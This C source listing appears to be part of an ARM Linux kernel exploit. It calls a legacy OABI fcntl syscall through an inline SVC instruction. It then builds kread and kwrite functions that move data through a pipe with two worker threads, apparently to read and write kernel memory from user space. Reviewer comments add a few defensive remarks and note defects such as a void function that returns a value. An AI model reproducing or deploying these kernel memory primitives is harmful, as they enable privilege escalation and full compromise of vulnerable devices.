/*
 * Transfer request handed to a worker thread: where the bytes go to or come
 * from in this process, and how many of them to move.
 */
struct thread_arg {
    char *buf;
    size_t size;
};

/* Pipe shared by all helpers: [0] is the read end, [1] the write end. */
int rw_pipe[2];

/* One request slot per worker thread (reader and writer). */
struct thread_arg ta_read;
struct thread_arg ta_write;

/*
 * Hand-off flags between the requesting thread and the workers.
 * They are plain ints polled by spin(); no lock or atomic type is involved.
 */
int read_asked = 0;
int read_done = 0;
int write_asked = 0;
int write_done = 0;
/*
 * Poll *lock until it becomes non-zero, sleeping 1000 microseconds between
 * checks. Returns immediately when the flag is already set.
 *
 * The flag is read through a plain int pointer; the function itself provides
 * no synchronisation beyond the repeated read.
 */
void spin(int *lock)
{
    for (;;) {
        if (*lock)
            return;
        usleep(1000);
    }
}
/*
 * Worker thread: each time read_asked is raised, read() the requested number
 * of bytes from the read end of rw_pipe into the request's buffer, then clear
 * read_asked and raise read_done.
 *
 * arg points at a struct thread_arg whose buf/size are filled in by the
 * requester before it raises read_asked. The loop never exits.
 */
void *thread_read_pipe(void *arg)
{
    struct thread_arg *req = arg;

    for (;;) {
        spin(&read_asked);

        /* A short count is only reported; the flags are still updated below. */
        ssize_t got = read(rw_pipe[0], req->buf, req->size);
        if (got < req->size)
            syserror("read_rw\n");

        read_asked = 0;
        read_done = 1;
    }
}
/*
 * Worker thread: each time write_asked is raised, write() the request's
 * buffer into the write end of rw_pipe, then clear write_asked and raise
 * write_done.
 *
 * arg points at a struct thread_arg whose buf/size are filled in by the
 * requester before it raises write_asked. The loop never exits.
 */
void *thread_write_pipe(void *arg)
{
    struct thread_arg *req = arg;

    for (;;) {
        spin(&write_asked);

        /* A short count is only reported; the flags are still updated below. */
        ssize_t put = write(rw_pipe[1], req->buf, req->size);
        if (put < req->size)
            syserror("write_rw\n");

        write_asked = 0;
        write_done = 1;
    }
}
/*
 * Copy `size` bytes from `addr` into `buf` by bouncing them through rw_pipe:
 * this thread write()s from `addr` into the pipe, then the reader thread
 * read()s the same bytes out into `buf`.
 *
 * kaddr_t is declared outside this listing; the name suggests a kernel
 * address. NOTE(review): an unmodified kernel is expected to reject a user
 * write() whose source pointer is outside user space, so this presumably
 * depends on the state left behind by the OABI call made in
 * exploit_to_read_write() - confirm against the affected kernel version.
 *
 * Always returns `size`; a short write is only reported through syserror().
 */
int kread(kaddr_t addr, void *buf, size_t size)
{
    ssize_t pushed = write(rw_pipe[1], addr, size);

    if (pushed < size)
        syserror("write_rw\n");

    /* Describe the destination first, then wake the reader thread. */
    read_done = 0;
    ta_read.size = size;
    ta_read.buf = buf;
    read_asked = 1;

    spin(&read_done);
    return size;
}
/*
 * Copy `size` bytes from `buf` to `addr` by bouncing them through rw_pipe:
 * the writer thread write()s `buf` into the pipe, then this thread read()s
 * the same bytes out with `addr` as the destination.
 *
 * kaddr_t is declared outside this listing; the name suggests a kernel
 * address. NOTE(review): an unmodified kernel is expected to reject a user
 * read() whose destination pointer is outside user space, so this presumably
 * depends on the state left behind by the OABI call made in
 * exploit_to_read_write() - confirm against the affected kernel version.
 *
 * The function is declared void but ends with `return got;`, exactly as in
 * the original listing; the mismatch is kept unchanged here.
 */
void kwrite(kaddr_t addr, void *buf, size_t size)
{
    size_t got;

    /* Describe the source first, then wake the writer thread. */
    write_done = 0;
    ta_write.size = size;
    ta_write.buf = buf;
    write_asked = 1;
    spin(&write_done);

    got = read(rw_pipe[0], addr, size);
    if (got < size)
        syserror("read_rw\n");
    return got;
}
/*
 * Issue one ARM supervisor call with the immediate 0x9000dd.
 *
 * 0x900000 is the base used by the legacy ARM OABI syscall convention, so the
 * immediate selects OABI syscall number 0xdd (221); the caller's log message
 * describes it as the OABI fcntl call.
 *
 * None of the C parameters is referenced by the asm statement. Presumably
 * they are expected to still sit in the first three argument registers when
 * the SVC executes; nothing in this function pins them there.
 *
 * Defensive note: as far as this reviewer knows, kernels built without
 * CONFIG_OABI_COMPAT ignore the SVC immediate and so do not expose this entry
 * path - verify for the deployed kernel configuration.
 */
void try_oabi(int dummy, unsigned long r1, char *aa)
{
    __asm__ __volatile__("SVC #0x9000dd\n\t");
}
/*
 * Set up the pipe-based transfer helpers used by kread()/kwrite().
 *
 * Order of operations, unchanged from the original listing:
 *   1. start the reader and writer worker threads (they idle in spin() until
 *      a request flag is raised);
 *   2. issue the OABI call through try_oabi() with command value 36 and a
 *      1000-byte stack buffer as the third argument;
 *   3. create rw_pipe, exiting with status 1 if pipe() fails.
 *
 * NOTE(review): 36 matches F_OFD_GETLK in the Linux fcntl headers - confirm
 * against the target's headers. The listing does not show which kernel
 * versions are affected; check the vendor advisory for the fixed release.
 *
 * pthread_create() results are not checked and the same pthread_t variable
 * receives both thread ids, so neither thread can be joined later.
 *
 * Returns 1 on success; does not return if pipe() fails.
 */
int exploit_to_read_write()
{
    char scratch[1000];
    pthread_t worker;
    int rc;

    pthread_create(&worker, NULL, thread_read_pipe, &ta_read);
    pthread_create(&worker, NULL, thread_write_pipe, &ta_write);

    /* No terminating ';' in the original either: `log` is defined outside
     * this listing and is presumably a macro that supplies its own. */
    log("calling oabi fcntl...")
    try_oabi(0, 36, scratch);
    success("Done!");

    rc = pipe(rw_pipe);
    if (rc < 0) {
        syserror("pipe_rw");
        exit(1);
    }
    return 1;
}